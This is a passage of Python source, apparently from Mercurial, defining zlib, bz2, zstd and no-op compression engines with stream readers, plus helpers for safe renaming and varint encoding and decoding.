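#           return it                         # a real engine compresses here
#       def decompressorreader(self, fh):
#           return fh                         # and decompresses here
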
class _CompressedStreamReader(object):
    def __init__(self, fh):
        if safehasattr(fh, 'unbufferedread'):
            self._reader = fh.unbufferedread
        else:
            self._reader = fh.read
        self._pending = []
        self._pos = 0
        self._eof = False

    def _decompress(self, chunk):
        raise NotImplementedError()

    def read(self, l):
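        # Serve ``l`` bytes from the decompressed-but-unread chunks in
        # self._pending, refilling by reading and decompressing 64k of
        # input at a time until enough data is buffered, EOF is hit, or
        # no progress can be made.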
        buf = []
        while True:
            while self._pending:
                if len(self._pending[0]) > l + self._pos:
                    newbuf = self._pending[0]
                    buf.append(newbuf[self._pos:self._pos + l])
                    self._pos += l
                    return ''.join(buf)

                newbuf = self._pending.pop(0)
                if self._pos:
                    buf.append(newbuf[self._pos:])
                    l -= len(newbuf) - self._pos
                else:
                    buf.append(newbuf)
                    l -= len(newbuf)
                self._pos = 0

            if self._eof:
                return ''.join(buf)
            chunk = self._reader(65536)
            self._decompress(chunk)
            if not chunk and not self._pending and not self._eof:
                # No progress and no new data, bail out
                return ''.join(buf)

class _GzipCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_GzipCompressedStreamReader, self).__init__(fh)
        self._decompobj = zlib.decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
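        # Detect end-of-stream without consuming real data: feed a sentinel
        # byte to a copy of the decompressor; if zlib hands it back in
        # unused_data, the compressed stream has ended.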
        d = self._decompobj.copy()
        try:
            d.decompress('x')
            d.flush()
            if d.unused_data == 'x':
                self._eof = True
        except zlib.error:
            pass

class _BZ2CompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_BZ2CompressedStreamReader, self).__init__(fh)
        self._decompobj = bz2.BZ2Decompressor()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except EOFError:
            self._eof = True

class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
    def __init__(self, fh):
        super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
        newbuf = self._decompobj.decompress('BZ')
        if newbuf:
            self._pending.append(newbuf)

class _ZstdCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh, zstd):
        super(_ZstdCompressedStreamReader, self).__init__(fh)
        self._zstd = zstd
        self._decompobj = zstd.ZstdDecompressor().decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except self._zstd.ZstdError:
            self._eof = True

class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _GzipCompressedStreamReader(fh)

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.StorageError(_('revlog decompress error: %s') %
                                         stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
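
# Illustrative sketch (not executed): a bundle-style round trip through
# the zlib engine, using only the interfaces defined above:
#
#   engine = compengines.forbundletype('GZ')
#   compressed = b''.join(engine.compressstream(iter([b'some ', b'data'])))
#   reader = engine.decompressorreader(bytesio(compressed))
#   assert reader.read(9) == b'some data'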

class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _BZ2CompressedStreamReader(fh)

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        return _TruncatedBZ2CompressedStreamReader(fh)

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _ZstdCompressedStreamReader(fh, self._module)

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # TODO consider omitting frame magic to save 4 bytes.
            # This writes content sizes into the frame header. That is
            # extra storage. But it allows a correct size memory allocation
            # to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.StorageError(_('revlog decompress error: %s') %
                                         stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())
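
# Illustrative sketch (not executed; requires the optional zstd module):
# revlog-style compression routes on the one-byte header declared by
# revlogheader():
#
#   engine = compengines['zstd']
#   if engine.available():
#       compressor = engine.revlogcompressor()
#       data = compressor.compress(b'x' * 1000)   # None if not worthwhile
#       if data is not None:
#           assert compressor.decompress(data) == b'x' * 1000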

def bundlecompressiontopics():
    """Obtains a dict of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()
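
# Illustrative sketch (not executed): with the default engines registered
# above, the mapping produced for the help system looks roughly like
#
#   {'gzip': <docobject>, 'bzip2': <docobject>, 'none': <docobject>, ...}
#
# where each value's __doc__ starts with the reST literal name (e.g.
# '``gzip``') followed by the engine's bundletype() docstring.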

# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn
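
# Illustrative sketch (not executed): assuming ctx contains neither
# candidate, safename picks the first untaken name:
#
#   safename('foo', 'resolve', ctx)                       # -> 'foo~resolve'
#   safename('foo', 'resolve', ctx,
#            others={'foo~resolve'})                      # -> 'foo~resolve~1'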

def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s

def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)
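
# Worked example of the encoding above: 1337 is 0b10100111001. The low
# 7 bits (0b0111001 = 0x39) are emitted first with the continuation bit
# set (0x39 | 0x80 = 0xb9); the remaining bits (1337 >> 7 = 10 = 0x0a)
# fit in one final byte, giving '\xb9\x0a' -- the '\xb9\n' seen in the
# doctest.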

def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7